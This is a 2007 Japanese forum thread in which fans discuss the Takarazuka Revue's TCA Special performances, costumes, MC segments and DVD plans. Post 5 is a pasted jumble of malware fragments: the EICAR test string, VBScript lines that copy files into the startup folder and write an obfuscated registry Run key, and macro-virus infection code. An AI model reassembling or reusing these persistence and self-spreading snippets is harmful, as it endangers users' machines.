5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【お祭り】TCAスペシャル4【イベント】

1 :名無しさん@花束いっぱい。:2007/09/09(日) 18:24:45 ID:GvHVj7Qr
年に一度のTCAスペシャル。
各組スターを取り揃え、お楽しみのアレコレ。
ファンも集って盛り上がるべし。

尚、このスレはTCA以外の特別イベントにもお使い頂けます。
980踏んだら、速やかに次スレたてお願いします。

前スレ
【お祭り】TCAスペシャル3【イベント】
http://hobby9.2ch.net/test/read.cgi/siki/1159060619/

2 :名無しさん@花束いっぱい。:2007/09/09(日) 18:26:40 ID:tDqmgppB


3 :名無しさん@花束いっぱい。:2007/09/09(日) 18:33:30 ID:QYKhHTYk
>1
乙カレー!

4 :名無しさん@花束いっぱい。:2007/09/09(日) 19:17:29 ID:08UDXHnc
>1
モツカレー

つ旦~ ―●▽●―

5 :名無しさん@花束いっぱい。:2007/09/09(日) 20:10:40 ID:erCUd0yJ
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


6 :名無しさん@花束いっぱい。:2007/09/09(日) 21:20:06 ID:zNZSH+MA
終わっての感想は・・・来年のTCAの主力出演メンバーはガラッと変わっていそうだなってことかな・・・

7 :名無しさん@花束いっぱい。:2007/09/09(日) 21:22:30 ID:fFdGiXBR
来年のTCAは真ん中に、りじぃが戻ってきまつ。

8 :名無しさん@花束いっぱい。:2007/09/09(日) 21:27:54 ID:oQWBtvbu
マミさんに司会をやってほしい。というか、司会を。

9 :名無しさん@花束いっぱい。:2007/09/09(日) 21:29:40 ID:MTYWSzkq
   ◇       ミ ◇
   ◇◇   / ̄|  ◇◇
 ◇◇ \  |__| ◇◇
    彡 O(;゚Д゚) /
       (  P `O
      /彡#_|ミ\
       </」_|凵_ゝ

10 :名無しさん@花束いっぱい。:2007/09/09(日) 21:35:08 ID:fFdGiXBR
来年にはTCAに、パワーアップしたキザリの(●▽●)が戻ってきまつ。

11 :名無しさん@花束いっぱい。:2007/09/09(日) 21:35:58 ID:HdajHTda
帰ってきてTCA前からのスレをずーっと読んだけど、
TCA前(スカステ稽古場放映後)→プログラムうp後→第1回目後→
第2回目後→東宝
で話題の移り変わりとか反応が面白い

12 :名無しさん@花束いっぱい。:2007/09/09(日) 21:38:56 ID:g+ouxDwl
来年もとうこ&あさこ、いるよね…?
まだやめなくていいからね…!!

13 :名無しさん@花束いっぱい。:2007/09/09(日) 21:40:35 ID:fWi9+0pK
月組コーナーであいあいの衣装が一人違うのが話題だったけど
相手のあひも違ったよね?

14 :名無しさん@花束いっぱい。:2007/09/09(日) 21:43:15 ID:oQWBtvbu
>>10
理事と闇練でつか。理事がしばらく見てたいって言ってたから、そのうち特訓でもするのかとオモタ・・・

15 :名無しさん@花束いっぱい。:2007/09/09(日) 22:08:21 ID:jBv0mhNu
>13
そう、二人ともブルーの衣装。
中継でユヒカナの良いところを全部あひあいにもって
いかれたw

16 :名無しさん@花束いっぱい。:2007/09/09(日) 22:13:50 ID:08UDXHnc
>15
そうそう!wゆひかな好きとしては非常〜に残念だったがwあひあいのリフトよかったよ。
てかあそこは引きのアングルで全体を映して欲しかった。

17 :名無しさん@花束いっぱい。:2007/09/09(日) 22:23:01 ID:fWi9+0pK
>>15
13です。
ありがd。
あまり話題になってないように思ったので、見間違えたかなと思って。

18 :名無しさん@花束いっぱい。:2007/09/09(日) 22:36:03 ID:sG2adEqQ
ところで、何日何時の回がDVDになるんでつか?

19 :名無しさん@花束いっぱい。:2007/09/09(日) 22:44:24 ID:i0MdpcJS
>18
カメラが何台も入ってたのは土曜日だけだとオモ。

ジブン的には、MC3回とも&オサトウのアフロ場面3回ともを特典で入れてくれればTCA GJ!なんだけど

20 :名無しさん@花束いっぱい。:2007/09/09(日) 22:46:00 ID:sG2adEqQ
>19
dでつ。
たしかにMCは3回とものが特典映像でほしい!

21 :名無しさん@花束いっぱい。:2007/09/09(日) 22:51:56 ID:3EqUFJPX
9/8の昼観た。
今回のTCA、物足りなかった点を挙げれば
-トップの場面中心で、しかも競演とかソロ曲のところは他の生徒を出さなかったので
トップ以外は見せ場があまりない。
-2番手も、ディスコのところでソロもらっていたけれど、一つの場面の流れだし
そろいの衣装だしで、それほど個性を発揮出来る余地がなかった。
-組ごとのコーナーがほとんどで、同じ番手くらいの連中が組横断的に
数人でアピールを競い合って歌い踊るという場面がなくて残念。
(ヒロインコーナーは、娘役トップは1曲で終わっといて
もう1曲はこの形にしても良かったと思う)

それでも、この数年の中ではすごく見応えのあるTCAだったなー。
今回のTCAに出たトップ達は、持ち味を十二分に発揮出来る
構成にしてもらって、本当に幸せだと思う。
自分の贔屓に目立つ出番なかったというガックリは差し引いても、
アサミズのダンス対決といい、オサトウコの歌競演といい、
会場全体で息を飲む雰囲気を体験出来て、聴衆としても幸福だった。
なんていうか、「いい芸を鑑賞した」という感想が出てくる。

自分の贔屓がもしトップになれて、こんな風にTCAで力量を披露出来たらすごく嬉しい。
オサさん、最後のTCAがこんな内容だなんてすごいラッキーだよ。この果報者!

22 :名無しさん@花束いっぱい。:2007/09/09(日) 22:55:59 ID:PstxUu6o
金曜日には映像用のカメラは無かったように思うよ残念だけど。

23 :名無しさん@花束いっぱい。:2007/09/09(日) 22:56:46 ID:cJGjB1OK
>>21
トップ以外見せ場がないに同感。

昔(10年くらい前?)自分の贔屓は三番手の頃でも
ソロあったのにな・・・て思った。
経験させなきゃ育たないのに・・・今のトップ以下の子が
確かにちょとかわいそうだった。

組ごとコーナーになってしまうのは、練習時間がそろえられないから?
これもかなり前から不満に思ってる。

ここ数年で一番みごたえがあったといのも同感。
東西わかれてやった2002年以来の好きなTCAになった。
(好きだったのは東京ですが・・・)


24 :名無しさん@花束いっぱい。:2007/09/09(日) 23:09:15 ID:8Mo1dvP9
見応えのあるTCA(TMP)がある時は、必ず決まってる。
学年が一番上で、かつ芸や人気も相応にあるトップが、最後で、トップの長でやるときは、序列に無理がでないせいか、盛り上がって出来が良い。
過去良かったTCA(TMP)って全部そうだった。
(個人的には、麻実最後の85年、大浦最後の91年、紫苑最後の94年、真矢最後の98年が、過去お勧め)。


25 :名無しさん@花束いっぱい。:2007/09/09(日) 23:13:39 ID:FYWQ/6I9
1個書き忘れた。
一番学年が上で、かつトップ就任もメンバー中ではほぼ最古(数ヶ月違いは無問題)のトップの時ですた。

26 :名無しさん@花束いっぱい。:2007/09/09(日) 23:23:56 ID:j3tzVGqM
>24
峰・高汐の同期トップが最後の年のTMPも凄かったよ。
構成といい出演者の歌レベルの高さといい、個人的にはあれが一番好きだった。
3番手はもちろん、路線外の歌ウマさんまで大きなソロもらってた。

27 :名無しさん@花束いっぱい。:2007/09/09(日) 23:38:05 ID:G3EuV8Qy
>21
最後のTCAがこんな内容でおさはラッキーというのは違うような。
おさが最後だから、おさだから、あんな内容にしてもらえたんだと思う。
人気・実力・劇団の愛と三拍子揃えることができたのは強運だったと思うけど。




28 :名無しさん@花束いっぱい。:2007/09/09(日) 23:46:42 ID:Py1mH0ge
おさもだけど、並びがいいんだよ。トップ4人のバランスが。
おさゆかりのメンバーだし。人気のある人たちばかり。で、轟抜き。
トップの比重が高いTCAだったと思う。おさはラッキーだったよ。

29 :名無しさん@花束いっぱい。:2007/09/09(日) 23:48:55 ID:X8EZKWJY
>27
劇団上層部のゴタゴタの関係?で
一旦退団を引き留めて延期をかけたせいで
結局退団イベントすらまともにしてやることができなくなったオサへの劇団のせめてもの餞かと・・・

それに劇団の愛といってもあそこまでやって貰おうと思ったら、まず実力と人気が本人にないとしてもらえない。
結局は本人の努力の結果でしょうね。
持って生まれた素質は天からの授かり物でしょうが。

30 :名無しさん@花束いっぱい。:2007/09/09(日) 23:55:06 ID:3/jSPund
ダンス対決、自分は水の方が良かった。
あさこは綺麗だけどつまらないんだよね。
水の方が繊細でワクワクする。
好みの問題ですが。
ちなみに生で2回みてます。

31 :名無しさん@花束いっぱい。:2007/09/10(月) 00:05:07 ID:S4VbEeuK
世陸の国歌斉唱+TCAが盛大なオサのさよならイベント代わりだった感じがした…。



32 :名無しさん@花束いっぱい。:2007/09/10(月) 00:07:10 ID:9ck1fwbd
退団イベントがなかったからその分TCAで、というのは確かにあったかもしれないね。


33 :名無しさん@花束いっぱい。:2007/09/10(月) 00:08:44 ID:+UOzHkhl
理事が出ないってのも、かなり影響してると思った。
あの人がいるだけで、場の空気が違うもん。
7日を生で見て、8日夜を中継で見たけど、
中継で理事が映っただけで、映画館の空気が冷めた感じになった気がした。

34 :名無しさん@花束いっぱい。:2007/09/10(月) 00:18:28 ID:XDvWpzox
それはたぶん気のせい

35 :名無しさん@花束いっぱい。:2007/09/10(月) 00:27:28 ID:uEywrafw
オサのためであろうと、結果的にレベルの高いTCAが見られてしゃーわせですた!

36 :名無しさん@花束いっぱい。:2007/09/10(月) 00:35:56 ID:onDoRntC
世田谷でもそんな空気を感じたよw
マミさんのおかげで随分救われたけど。
理事タニの歌には拍手が起こらなかったな…
まあそこいらのファンは東宝行ってるだろうけどね。

37 :名無しさん@花束いっぱい。:2007/09/10(月) 00:38:43 ID:UZPiJTPb
理事とともに、タニがいなかったこともトップの芸競演企画が実現出来(モニョ

来年は両方いそうだ・・・


38 :名無しさん@花束いっぱい。:2007/09/10(月) 00:50:39 ID:9ck1fwbd
中継で見ていて、理事登場で空気が変わったかどうかは分からなかったけど、
タニが持ち歌の歌い始めに目を細めてキザ顔を作ったとき、
会場が苦笑いな雰囲気になったのははっきり分かった。
冷ややかとは違い、しょうがないな〜みたいな何とも言えない空気で笑えた。


39 :名無しさん@花束いっぱい。:2007/09/10(月) 00:53:56 ID:jGTuQz/1
>>37学年が繋がってないし、実年齢も離れうわなにwせdfrtgyとうこpl:

40 :名無しさん@花束いっぱい。:2007/09/10(月) 00:59:58 ID:6kMKLLzx
(●▽●)<みなさま、こんごもあたたかくみまもってほしいでつ

41 :名無しさん@花束いっぱい。:2007/09/10(月) 01:01:31 ID:rU/kqQL2
来年も9月開催だと、星組が参加できないとか、どこかで読んだけど・・。
そうなると、来年は理事・麻子・水・タニ・まとぶの並び?
今年いた歌うまトップ2人が抜けるのね。
いっそのこと、水・タニ歌対決とかいいかもね。

42 :名無しさん@花束いっぱい。:2007/09/10(月) 01:07:38 ID:BNxRKKYK
>>41
じゃあとうこも今年が最後のTCA?

43 :名無しさん@花束いっぱい。:2007/09/10(月) 01:09:13 ID:6kMKLLzx
>>41
(●▽●)<さいごのたんす、れんしゅうしておきまつ。

44 :名無しさん@花束いっぱい。:2007/09/10(月) 01:13:13 ID:MeslWRKp
タニは可愛いから、キザりも、歌も許すわ。

ところで、OSA ASAコーナーは、
アプローズのタキシードでの銀橋場面をやってくれたほうが
良かったなあ。

45 :名無しさん@花束いっぱい。:2007/09/10(月) 01:16:35 ID:uEywrafw
>42
今年のTCAの構成から考えて、最後だったトップはもっと多数だと思われ・・・

46 :名無しさん@花束いっぱい。:2007/09/10(月) 01:16:56 ID:rU/kqQL2
>42 イヤー、自分に聞かれても・・。
どこに来年のローテションが変わらなくて、
9月開催だと、星組が参加できないとどこかで読んだだけで、
再来年のTCAには、とうこは参加するかもしれないし。

47 :名無しさん@花束いっぱい。:2007/09/10(月) 01:21:20 ID:BNxRKKYK
>>46
いやいやスマソ
人事スレに毒されてるな漏れ
>>44
漏れはあさこがやりたがってたエリザをおさトートでやってくれんか脳と思ってたお

48 :名無しさん@花束いっぱい。:2007/09/10(月) 07:25:07 ID:VN6kZ5TU
スカステ販売DVDは、8日夜の映像で、おまけ映像も昼のト−ク部分くらいかな。
初回はカメラ入ってた?
スカステニュースは楽映像だったし、特番中継の時流れたのは、
昼映像。
初回のかみかみMCが楽しかったのに残念。

49 :名無しさん@花束いっぱい。:2007/09/10(月) 07:28:45 ID:z1sTCDGV
収録は8日夜。
特典は稽古場映像だそうです。
TCAショップによると。

50 :名無しさん@花束いっぱい。:2007/09/10(月) 08:08:26 ID:DA4fmLmb
2元中継があった会なんだね。
おさは言うまでもないけど、まみさん、とうこ、おいしいぞ!

51 :50:2007/09/10(月) 08:10:36 ID:DA4fmLmb
誤)あった会→正)あった回
失礼いたしました。

52 :名無しさん@花束いっぱい。:2007/09/10(月) 08:30:44 ID:LWL9zsa4
初回とラスト観たけど、8日夜ので、どうしてあんなに
とうこはMCで笑いをこらえられなかったの?
8日昼公演で、何か原因があった?

53 :名無しさん@花束いっぱい。:2007/09/10(月) 09:12:38 ID:hz61tLDP
来年も理事が出るなら
贔屓組には理事が出ないほうの劇場に当たってほしいな。
ほいで二元中継とかイラネ

54 :名無しさん@花束いっぱい。:2007/09/10(月) 09:49:10 ID:4BER93lt
>49
他の回のトークとかは特典で入らないみたいだね。残念だなー。
ミニ座談会とかもないみたいだし。

55 :名無しさん@花束いっぱい。:2007/09/10(月) 10:41:48 ID:BNxRKKYK
>>53
今年分裂したのはスカステ5周年特別仕様ナンジャネ?

56 :名無しさん@花束いっぱい。:2007/09/10(月) 10:58:00 ID:cXfQBIm1
二元中継ってほとんど意味なかったような。
その分、下級生達に1曲でも歌わせてほしいな。

でも今回、これだけトップ仕様だったのは来年、おさ以外いない人もいるのかもね。

57 :名無しさん@花束いっぱい。:2007/09/10(月) 11:44:55 ID:WwKOGZ+u
普通に、今はどの組もトップが強くて比重が高いからじゃね?
今のトップさん達、2002年のTCA「DERAM」から人気高かったし。
当時、東西開催でも、今年みたいにOGの力借りなくて充分TCAできたんだから。


58 :名無しさん@花束いっぱい。:2007/09/10(月) 11:53:28 ID:VN6kZ5TU
今年のTCAも別にOGの力借りてないやん。
それでも大人気。
スカステイベントは宙救済策ぽいけど。

59 :名無しさん@花束いっぱい。:2007/09/10(月) 11:59:05 ID:Gsv21Erq
>52
オサからの「モン・パリを〇〇語で言うと?」ってやりとりの後に
またオサからモン・パリの説明始まるのに
〇〇語のMCで大笑いしたためオサが後の台詞忘れて
7日はミズが教え、8日昼はトウコが教え、オサは「何でみんなのが覚えてんの〜?」と言ってた。
で、8日夜のオサは忘れないことに一生懸命で〇〇語のMCをとばしたの。
〇〇語の質問を最後にオサへふるのがトウコで
7日は台本通り?のスワヒリ語で、8日昼はアドリブのドイツ語でオサがアワアワしてた(笑)
なので8日夜のアドリブも考えてたのにオサにすっとばされたんで笑ってたんじゃないかと。

60 :名無しさん@花束いっぱい。:2007/09/10(月) 12:29:14 ID:bFowfcyV
>>58
OGの力借りてるっていうのは、もちろん今年の東宝のことを言っているのでしょ。
2002年は現役の2〜3番手(現在のトップ)だけで、東宝でTCAが開催できたんだから。

61 :名無しさん@花束いっぱい。:2007/09/10(月) 12:36:39 ID:cXfQBIm1
>>60
一応、トドと檀ちゃんも出ていたので入れてあげてね。

62 :名無しさん@花束いっぱい。:2007/09/10(月) 12:38:51 ID:BNxRKKYK
宙+(公演中の月除く)各組2、3番手でやったら
東宝くらいなら埋められるんジャマイカ?
3公演は難しいだろうけど

63 :名無しさん@花束いっぱい。:2007/09/10(月) 13:33:14 ID:oEmarohN
>62
月の2、3番手をキリユヒとすると、そこ抜きにしたら
まと・壮・ゆみ・キム・ちえ・和(?)+宙ってメンバーか。
…ビミョンに厳しそうな気もする。
そう考えるとDREAMの時は、理事がまだ現役みたいなもんだったにしても
よく三回公演しっかり埋めたもんだな。PB第一世代恐るべしってことか。

64 :名無しさん@花束いっぱい。:2007/09/10(月) 16:18:14 ID:mQaQA5yx
>63
和のどこをどうみたら星の三番手にみえるんだ?

65 :5組とも観劇:2007/09/10(月) 17:28:05 ID:JY216Y+/
>>58
>宙救済策

あるかも。
一回行くつもりっだたが、二回にした。

66 :名無しさん@花束いっぱい。:2007/09/10(月) 17:31:01 ID:zNPExfmU
↑だと、星の3番手立樹が、花・雪・宙の2番手より上級生で扱いがややこしいからできないよ。
立樹も大空同様劇団が処理に困ってる(既に肩叩き?)生徒だけど。

67 :名無しさん@花束いっぱい。:2007/09/10(月) 18:13:47 ID:KpmjPOy+
>>63
よく埋めたどころか、かなりチケット難だったよ。
確かにあのメンツは勢いがあった。

68 :名無しさん@花束いっぱい。:2007/09/10(月) 21:10:08 ID:pYILUKF2
ねー流れ切って悪いんだけど
2部のディスコミュージックのとこでまとぶの歌ってたの
何て曲だっけ?
あれだけ思い出せないんだよね・・・

69 :名無しさん@花束いっぱい。:2007/09/10(月) 21:43:21 ID:ZfJ3kp9G
>>68
前スレ504見ろや。

70 :名無しさん@花束いっぱい。:2007/09/10(月) 21:56:37 ID:OxTJTAHo
>>64
普通に見たら、3番手だと思うよ。
しい&すずみんは、路線じゃないからね。

71 :名無しさん@花束いっぱい。:2007/09/10(月) 22:21:23 ID:CUFGtLLO
そーなの?じゃ星の3、4番手は誰にあたるの?

72 :名無しさん@花束いっぱい。:2007/09/10(月) 22:22:51 ID:CUFGtLLO
ごめんアゲちゃった…
ついでに4、5番手は誰?の間違いでした

73 :名無しさん@花束いっぱい。:2007/09/10(月) 22:27:59 ID:za6NKUXL
最後のトップ4人ソロの時の衣装って新調じゃないよね?

74 :名無しさん@花束いっぱい。:2007/09/10(月) 22:30:34 ID:4ebV8II4
>70
最低限バウやって階段一人降りしてから言ってくれ

75 :名無しさん@花束いっぱい。:2007/09/10(月) 22:33:52 ID:KfvY0SOv
星の3、4番手は不在、これが正解でしょう。
しい&すずみんは番手関係ないからね。

76 :名無しさん@花束いっぱい。:2007/09/10(月) 22:34:09 ID:vm52XAWw
>73
水のトートコートはどっかで見たことあるかも試練が
オサのあの「前を閉じたらウェディングドレスv」なピンクの衣装は…
自分は記憶にない…。

77 :名無しさん@花束いっぱい。:2007/09/10(月) 22:38:41 ID:rJ6V3CN5
つ 【宝塚】衣装の着回し 2着目
http://hobby9.2ch.net/test/read.cgi/siki/1169706113/

78 :名無しさん@花束いっぱい。:2007/09/10(月) 22:40:59 ID:EqS/bM4N
>73
どこかのスレに元が誰の衣装か書いてあったけど・・・

オサのとアサコのは、元々が自分の衣装。
どちらもDSのだと聞いてる。
つか、オサのピンクのは、この間のDSのフィナーレで(CSで)見た。

自分が気になってるのは、組コーナーのオサのスミレ色のスパンの衣装。
元は誰のだろう?

79 :名無しさん@花束いっぱい。:2007/09/10(月) 23:00:32 ID:M+Ta0uzy
>78
順みつき

80 :名無しさん@花束いっぱい。:2007/09/10(月) 23:07:50 ID:KfvY0SOv
>79
そんな昔の古い衣装も、使いまわしするの?

81 :78:2007/09/10(月) 23:19:46 ID:qnRS0xJQ
>79
ガセ書かなくていいよ>別スレでミッキーをネタにしてるヤシ。
ミッキー、顔は大きかったけど、現役時代は榛名由梨みたいに太ってなかったのも知ってるし。

あの紫のスパンの生地、最初に94年の公演で登場したって知ってるから。
ただ、それとは全然デザインが違うし、その後に見た覚えはある。



82 :名無しさん@花束いっぱい。:2007/09/10(月) 23:33:23 ID:LfkuI+UC
本当にガセばっかり書くニョラリヒョンがいて困った世の中だわね。
ミッキーの衣装であるはずがないじゃないの。
>78
真実は一つ。
大滝子のものだわ。

83 :名無しさん@花束いっぱい。:2007/09/11(火) 00:22:48 ID:2qK8H9xK
オサのピンクふさふさにはびっくりしたw

おまけみたいな、ふさふさ…正直、ない方がマシだった…。

84 :名無しさん@花束いっぱい。:2007/09/11(火) 00:55:30 ID:9CuRusK4


85 :名無しさん@花束いっぱい。:2007/09/11(火) 01:27:17 ID:4KjO9g7A
8日の録画を見ていて気付いたんだけど、
2番手で扱いが突出していたと言われているきりやん、
フィナーレ黒燕尾の襟飾りが縦は2本で横は1本。
まとぶゆみこゆうひしいちゃんは縦も横も2本。
何か意図があったのだろうか。
1人で歌うかわりに横1本マイナスとか?

86 :名無しさん@花束いっぱい。:2007/09/11(火) 02:21:34 ID:QBgrPLXu
トップ中心のTCAだったから、実力も魅せ方も安定していて
レベルが高かった、ともいえるし、
トップそれぞれにちゃんと売りがあったから、
他でカバーしなくてもよかった、ともいえる。

でも、やはり理事が出なかったことは
空気が重いTCAにならなくてすんだ最大の要因だと思う。

87 :名無しさん@花束いっぱい。:2007/09/11(火) 02:32:27 ID:ANICuLpt
うん、今年のトップはそれぞれ良かったよね。
あそこに理事が出ていたら・・・
今年の理事、声出てなかったし、恥じかいてたかも。
出れなくて、理事にとっても幸いだったよ。

88 :名無しさん@花束いっぱい。:2007/09/11(火) 09:02:52 ID:V7IMuSSP
やっぱり、あちこちのスレ荒らしているのはトップファンてのが明らかだね。
トップファンが満足しているとマッタリした雰囲気だわw
2番手以下のファンは空気読んで、不満も最小限だし。

89 :名無しさん@花束いっぱい。:2007/09/11(火) 15:21:02 ID:vtoPVUUe
○○ファン、の決めつけは恥ずかしいなぁ〜。

90 :名無しさん@花束いっぱい。:2007/09/11(火) 15:54:30 ID:RypUO21N
>89
〇〇ファンと決め付けるのがココの特徴だけど、
〇〇ファンのせいにした方が都合が良いし心も落ち着くってことね。


91 :名無しさん@花束いっぱい。:2007/09/11(火) 16:08:23 ID:Aq6sM32T
〇〇〇ファンがすべての元凶だからね。

92 :名無しさん@花束いっぱい。:2007/09/11(火) 16:31:12 ID:RypUO21N
>91
〇ファン、〇〇ファン、〇〇〇ファン、〇〇〇〇ファン、〇〇〇〇〇ファン…
決め付けはココが戦場と化すから止めようねと言う事。分かって欲しいなぁ。

93 :名無しさん@花束いっぱい。:2007/09/11(火) 19:36:48 ID:jg3bL+GN
同意。○○ファン決めつけはもううんざり。
アンチだかなんだか知らないが、やっててよく飽きないもんだ。

94 :名無しさん@花束いっぱい。:2007/09/12(水) 10:34:02 ID:aWfTHrOy
〇がいっぱいで笑えるな。
団子や饅頭と勘違いして、かなみんがとんできそうだ。

95 :名無しさん@花束いっぱい。:2007/09/12(水) 17:49:17 ID:gb0g6oDF
やっと見た。
トーコって、先輩には、いじられキャラだったんや。
いじられぱなしなところに萌え〜。

しかし、まこと、お疲れさま。
進行ほんとに良かった。

トーコ「ナイト&デイ」なぜ、歌詞歌わずにスキャットにしたのだろう。
次すぐ同じのをするのに・・・。
仕込みを考え過ぎ、歌詞覚える暇がなかったか・・・。

来年は、トーコ、ユミコ、キリヤンで、
聞かせるのを、お願いしたい。

96 :名無しさん@花束いっぱい。:2007/09/12(水) 19:03:36 ID:QidTBlT1
>>83
本人気に入ってるの。許してあげて…

97 :名無しさん@花束いっぱい。:2007/09/12(水) 21:12:22 ID:/zkMtm1j
>48 >49
8日夜っつーとオサがモンパリ話すっ飛ばした超gdgdトークのときですか?
あれはあれで面白かったけど、
オサアサトークは8日昼のが好きなんだよね、自分は。
残り2回のトークも入れてほしいなー。

てか、そもそもトークはDVDに収録されるんですかね?
去年のTCA2006は、CS放送では2番手トークとかカットされてたけど
販売DVDには入ってたんすか?

98 :名無しさん@花束いっぱい。:2007/09/12(水) 21:14:56 ID:AS5plK3E
>>97 TCA2006、確か2番手トーク放送されたお。
DVD買ってないけど観た覚えがある。

99 :名無しさん@花束いっぱい。:2007/09/12(水) 21:16:38 ID:SiARhY6E
>97
DVDにはありましたよ>2番手トーク

マミさんたち四天王の時はトークはおまけ映像で
抜粋だけど全回収録されてたんだけどね


100 :名無しさん@花束いっぱい。:2007/09/12(水) 23:58:25 ID:JMpTfhSz
初日の上手カメラ席近くの座席でしたが
映像用のカメラは見なかった気がするんですけど・・・入ってて無事収録ならいいですね。

スカステでも2006年の2番手トークは確か楽公演のが入ってました。
トップさんトークも同じく楽公演のだったです。

101 :名無しさん@花束いっぱい。:2007/09/13(木) 00:08:10 ID:GS6ZRC66
2006の初日を観たけど、スチールカメラのカシャカシャする音がうるさかった。
舞台稽古じゃなくて初日なんだと驚いたが
初日はある意味舞台稽古みたいなもんなんじゃないか。

15時公演は中継の為にカメラが入ってたから
可能性ゼロじゃないと思うが
特典映像と特記してなければ普段どおり楽のみだと思う。

102 :名無しさん@花束いっぱい。:2007/09/13(木) 01:32:45 ID:2s7Xllrs
>95
私もいじられとうこさんが気に入ったw
しかも、ぜんぜん取り繕わないの。
いいなぁああいう態度、面白い。

103 :名無しさん@花束いっぱい。:2007/09/13(木) 17:43:00 ID:foWGAo0z
理事の態度がわかりやすいとうこへの感情でそ。
コムの一言、悪気がなくても始末が悪い。
時間が押した原因はとうこじゃないのに。

104 :名無しさん@花束いっぱい。:2007/09/13(木) 17:53:33 ID:9y2TmV/2
>103
あれは同期ならではの微笑ましい発言だと思うけど。
誰も悪意にとったりしてないでそ?

105 :名無しさん@花束いっぱい。:2007/09/13(木) 21:16:19 ID:/zDabBgX
組コーナー
花は正統・ゴージャス星っぽい
雪はスーツで粋な花っぽい
星は地味ーな雪テイスト

106 :名無しさん@花束いっぱい。:2007/09/13(木) 21:40:25 ID:XffvO2iw
>>105
それなんとなくそう思った。

月はとりあえず、ここ10年の月のイメージ
まんまかな。その前の月とはだいぶ違うが・・・

107 :名無しさん@花束いっぱい。:2007/09/13(木) 21:47:42 ID:5pYfgtSO
私はミズが挨拶してるときの理事の無関心表情にビックリしましたヨ。
アップで抜かれてると気づいてなくても油断してしまった轟さん!!
ミズに興味なしなのがバレバレでした!。

108 :名無しさん@花束いっぱい。:2007/09/13(木) 21:47:50 ID:HSYiw2xZ
>>104
うん取ってない。

マミ理事といい、
同期っていいなってオモタ

109 :名無しさん@花束いっぱい。:2007/09/13(木) 21:49:27 ID:HSYiw2xZ
>>107
悲しい人だ〜〜

悪意に見れば、なんでも悪意に取れる。

110 :名無しさん@花束いっぱい。:2007/09/13(木) 22:50:43 ID:1KU1W76n
ちゃんと聞いてたじゃん。>107

対談もしてたっけ、と思いながら見たけど?
理事は舞台で気を抜いたりしないよ。

111 :名無しさん@花束いっぱい。:2007/09/13(木) 23:28:05 ID:Z/+g2qz+
亀だけど
>>95
>トーコ「ナイト&デイ」なぜ、歌詞歌わずにスキャットにしたのだろう。
次すぐ同じのをするのに・・・。
仕込みを考え過ぎ、歌詞覚える暇がなかったか・・・。

↑あのさ、これは普通に演出家の指示だと思うよ。
TCAのとうこおもしろかったな〜
それにしても、あの理事に手をふって「イシちゃ〜ん」なんていえるのは
とうこぐらいだw
東宝で自分がネタにされてたと聞いたら喜びそう。

112 :名無しさん@花束いっぱい。:2007/09/14(金) 09:56:38 ID:OFVL6/iQ
今日のスカステニュース、スカイナビゲーションのお題が
タカラヅカオリジナルブランドウェディングドレスなんだけど、
最初の1分ほど、TCAのトプ娘sウェディングドレス場面が流れたお。

113 :名無しさん@花束いっぱい。:2007/09/14(金) 10:22:28 ID:nL9+nIyZ
昨年のほうが面白かった

114 :名無しさん@花束いっぱい。:2007/09/14(金) 11:34:27 ID:8PhkmICH
昨年のトップの並びのほうが華やかだった

115 :名無しさん@花束いっぱい。:2007/09/14(金) 14:18:43 ID:L5Kmvqon
?????

116 :名無しさん@花束いっぱい。:2007/09/14(金) 14:23:54 ID:dS2s8vg6
確かに昨年の方がゴージャスだった。
今回は地味トウコ、老化オサ、妖怪ミズや軽薄アサコ、幼稚タニ、親父トド・・言わずもがなだ。

117 :名無しさん@花束いっぱい。:2007/09/14(金) 14:25:54 ID:2NUxMFOS
はいはい、と。

118 :名無しさん@花束いっぱい。:2007/09/14(金) 14:38:13 ID:8EWxsPF5
>116
みんな個性違う点にちょっと感動したw

DVD待ちなんだけど、ようつべで少し上げられてるの見た。
トゥダンホットを歌ってる娘役はあすかちゃん?かなみちゃん?なかなかいいなと思った。
オサは歌声が昔(トート前後)の声に戻ってるような。

119 :名無しさん@花束いっぱい。:2007/09/14(金) 14:40:16 ID:TgX8pkZ1
>>116はけっこういいとこ突いてると思うw
地味・老化・妖怪・軽薄・幼稚・親父・・
実に個性的でおもろい並びだw

120 :名無しさん@花束いっぱい。:2007/09/14(金) 14:55:50 ID:GbSfSE1d
>118
トゥー・ダン・ホットはあすか
かなみはドレミの歌だから

121 :名無しさん@花束いっぱい。:2007/09/14(金) 14:57:03 ID:8PhkmICH
老人オサ地味トウコのいない
来年のTCAが楽しみだ!

122 :名無しさん@花束いっぱい。:2007/09/14(金) 14:58:20 ID:8EWxsPF5
>120
ありがとう〜。

123 :名無しさん@花束いっぱい。:2007/09/14(金) 14:58:34 ID:Qon8uQIY
来年はフナが新規参入する。

124 :名無しさん@花束いっぱい。:2007/09/14(金) 15:04:22 ID:8EWxsPF5
ますますわけ分からん、でも個性的な並びだねw>フナ加入

125 :名無しさん@花束いっぱい。:2007/09/14(金) 17:45:07 ID:Z4AQ85Nv
TCAに出ていない退団者が贔屓のファンか、
出番の少なかった2番手ファンか…、未練たらしい貶し方。

126 :名無しさん@花束いっぱい。:2007/09/14(金) 20:04:40 ID:nL9+nIyZ
>>125
そういう言い方はないんじゃない?
昨年のほうが面白かったと言ったら駄目って決まりはないでしょ
すぐ退団者ファンとか2番手ファンとか決め付けて感じ悪い
感想は人それぞれでしょ

